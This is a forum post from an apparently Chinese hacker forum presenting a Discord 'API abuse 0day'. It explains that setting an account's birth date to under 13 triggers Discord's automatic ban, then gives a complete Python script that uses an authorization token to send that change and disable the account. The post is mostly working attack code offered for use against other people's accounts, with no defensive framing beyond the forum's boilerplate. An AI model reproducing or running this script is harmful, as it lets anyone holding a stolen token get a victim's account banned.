• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

API滥用 0day


This Wind

Recommended Posts

禁用令牌

描述

将帐户的出生日期设置为小于13岁以禁用令牌,因为Discord会自动禁用所有者小于13岁的帐户。请注意,已设置DoB的帐户不受此漏洞的影响。

原始创始人

未知

用法

py example.py <token>
# Name: Account Disabler
# Description: Disable (ban) Discord accounts through authorization tokens
# Author: checksum (@0daySkid)
# Original founder: unknown

import requests
import sys

class Exploit:

    DISABLED_MESSAGE = "You need to be 13 or older in order to use Discord."
    IMMUNE_MESSAGE = "You cannot update your date of birth."

    def __init__(self, token):
        self.token = token
        self.headers = {'Authorization': token}


    def execute(self):
        """ set DoB to < 13 yo """
        res = requests.patch('https://discordapp.com/api/v6/users/@me', headers=self.headers, json={'date_of_birth': '2017-2-11'})

        if res.status_code == 400:
            res_message = res.json().get('date_of_birth', ['no response message'])[0]
            
            if res_message == self.DISABLED_MESSAGE:
                print('Account disabled')

            elif res_message == self.IMMUNE_MESSAGE:
                print('Account is immune to this exploit')

            else:
                print(f'Unknown response message: {res_message}')
        else:
            print('Failed to disable account')
    

def main():
    if len(sys.argv) < 2:
        print(f'Usage: py {sys.argv[0]} <token>')
        sys.exit()

    token = sys.argv[1]

    exploit = Exploit(token)

    exploit.execute()


if __name__ == '__main__':
    main()

 

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now